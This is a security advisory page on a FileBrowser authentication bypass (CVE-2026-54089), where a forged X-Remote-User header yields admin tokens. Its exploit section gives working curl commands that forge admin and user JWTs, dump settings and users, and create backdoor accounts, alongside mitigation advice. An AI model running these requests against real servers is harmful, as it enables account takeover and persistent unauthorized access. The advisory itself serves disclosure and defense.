FileBrowser, Authentication Bypass via Proxy Auth Header Forgery, CVE-2026-54089 (Critical) -DC-Jul2026-863

Listen to this Post

How CVE-2026-54089 Works

FileBrowser is a popular web-based file manager. In its default configuration, it uses JSON-based authentication (auth.method=json), which requires a username and password. However, it also supports a “proxy” authentication mode (auth.method=proxy) designed for deployments behind a reverse proxy (like nginx, Traefik, or Caddy) that handles Single Sign-On (SSO), LDAP, or OAuth.
In this proxy mode, the reverse proxy authenticates the user and then passes the verified username to FileBrowser via an HTTP header, commonly X-Remote-User. FileBrowser’s code then trusts this header value completely to identify the user, bypassing any password verification.
The core vulnerability, identified as CVE-2026-54089, stems from three critical flaws in this trust model:
1. No Origin Validation: The `ProxyAuth.Auth()` function in `auth/proxy.go` reads the header from any HTTP request, without checking if the request actually came from the trusted reverse proxy. An attacker can directly connect to the FileBrowser server and set this header.
2. No Password Verification: Unlike the JSON auth method, the proxy auth path doesn’t verify a password. If the header provides a username, `loginHandler` in `http/auth.go` simply returns a valid JWT for that user, minting a session token with their permissions.
3. Automatic User Creation: If the username in the forged header doesn’t exist in the database, the `createUser()` function is called automatically. This creates a new user account with default permissions and a locked password, providing an unauthenticated attacker with a primitive for creating persistent backdoor accounts.
This vulnerability is not exploitable by default but is triggered when an administrator enables proxy authentication and the FileBrowser port is exposed to the network (e.g., bound to 0.0.0.0). In this scenario, an attacker who can reach the server directly can impersonate any user, including the admin, with just a single forged HTTP header.

DailyCVE Form

Platform: FileBrowser
Version: 2.0.0-rc.1 and later
Vulnerability: Authentication Bypass
Severity: Critical
date: 2026-07-10

Prediction: 2026-08-10

What Undercode Say: Analytics

The vulnerability allows for complete account takeover with zero credentials.

Vulnerable Configuration Check

Check if proxy auth is enabled
filebrowser config cat | grep -A 1 "auth.method"
Look for: auth.method = proxy

Exploitability Test

Attempt to forge an admin token
curl -s -X POST http://<filebrowser-ip>:<port>/api/login -H "X-Remote-User: admin"
If a JWT token is returned, the server is vulnerable.

How Exploit

An attacker can perform the following steps to gain full control:
1. Forge Admin Identity: Send a `POST` request to `/api/login` with the header X-Remote-User: admin. No password is required.

FORGED_TOKEN=$(curl -s -X POST http://localhost:8085/api/login -H "X-Remote-User: admin")

2. Access Admin-Only Endpoints: Use the forged JWT to access sensitive API endpoints like `/api/settings` to read full server configuration, or `/api/users` to enumerate all user accounts.

curl -s http://localhost:8085/api/settings -H "X-Auth: $FORGED_TOKEN"
curl -s http://localhost:8085/api/users -H "X-Auth: $FORGED_TOKEN"

3. Impersonate Any User: Repeat the process with a different username in the `X-Remote-User` header to get a JWT for any other user.

VICTIM_TOKEN=$(curl -s -X POST http://localhost:8085/api/login -H "X-Remote-User: victim")
curl -s http://localhost:8085/api/resources/ -H "X-Auth: $VICTIM_TOKEN"

4. Create a Backdoor Account: Specify a non-existent username to auto-create a new, persistent user account.

BACKDOOR_TOKEN=$(curl -s -X POST http://localhost:8085/api/login -H "X-Remote-User: backdoor_account")

Protection

  • Immediate Mitigation: Ensure the FileBrowser instance is not directly reachable from untrusted networks. It should be bound to `127.0.0.1` or protected by a firewall, allowing access only from the reverse proxy.
  • Long-term Fixes (Code/Configuration):
  • Add Trusted Proxy Validation: The code should be patched to validate the source IP of the request against a list of trusted proxies.
  • Make User Creation Opt-In: A configuration flag (e.g., auth.proxy.createUsers) should be added and default to `false` to prevent automatic account creation.
  • Vendor Advisory: The issue is documented in the GitHub Security Advisory [GHSA-xqp3-jq6g-x3qm】.

Impact

An unauthenticated attacker who can reach the FileBrowser instance directly can achieve:
– Full Admin Takeover: Impersonate the admin user and gain complete control over the application.
– Data Breach: Read all server settings, enumerate all users, and access every user’s files without any credentials.
– Account Creation: Create unlimited, persistent backdoor accounts for future access.
– Remote Code Execution (RCE): By gaining admin access, an attacker can modify the server configuration to enable command execution (shell mode) and run arbitrary system commands on the host.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top